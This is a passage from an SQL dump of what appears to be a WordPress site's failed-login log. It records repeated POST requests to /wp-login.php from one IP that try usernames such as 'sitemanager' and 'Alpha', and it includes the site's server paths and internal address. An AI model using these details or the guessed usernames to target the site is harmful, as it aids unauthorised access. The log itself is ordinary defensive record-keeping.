23:44:41'),(94878,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63960\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746444963.6056471;s:12:\"REQUEST_TIME\";i:1746444963;}}','107.151.209.126',1,'2025-05-05 17:06:05','2025-05-06 23:44:41'),(94879,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63958\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746444963.5758669;s:12:\"REQUEST_TIME\";i:1746444963;}}','107.151.209.126',1,'2025-05-05 17:06:05','2025-05-06 23:44:41'),(94880,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60554\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746447095.606847;s:12:\"REQUEST_TIME\";i:1746447095;}}','107.151.209.126',1,'2025-05-05 17:41:37','2025-05-06 23:44:41'),(94881,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60551\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746447095.6084781;s:12:\"REQUEST_TIME\";i:1746447095;}}','107.151.209.126',1,'2025-05-05 17:41:37','2025-05-06 23:44:41'),(94882,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60556\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746447095.6239431;s:12:\"REQUEST_TIME\";i:1746447095;}}','107.151.209.126',1,'2025-05-05 17:41:37','2025-05-06 23:44:41'),(94883,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60553\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746447095.6048729;s:12:\"REQUEST_TIME\";i:1746447095;}}','107.151.209.126',1,'2025-05-05 17:41:37','2025-05-06 23:44:41'),(94884,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60541\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746447095.6123869;s:12:\"REQUEST_TIME\";i:1746447095;}}','107.151.209.126',1,'2025-05-05 17:41:37','2025-05-06 23:44:41'),(94885,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54208\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746449237.0589731;s:12:\"REQUEST_TIME\";i:1746449237;}}','107.151.209.126',1,'2025-05-05 18:17:18','2025-05-06 23:44:41'),(94886,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54210\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746449237.075079;s:12:\"REQUEST_TIME\";i:1746449237;}}','107.151.209.126',1,'2025-05-05 18:17:18','2025-05-06 23:44:41'),(94887,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54199\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746449237.0297849;s:12:\"REQUEST_TIME\";i:1746449237;}}','107.151.209.126',1,'2025-05-05 18:17:18','2025-05-06 23:44:41'),(94888,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54209\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746449237.0888391;s:12:\"REQUEST_TIME\";i:1746449237;}}','107.151.209.126',1,'2025-05-05 18:17:18','2025-05-06 23:44:41'),(94889,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54183\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746449237.031137;s:12:\"REQUEST_TIME\";i:1746449237;}}','107.151.209.126',1,'2025-05-05 18:17:18','2025-05-06 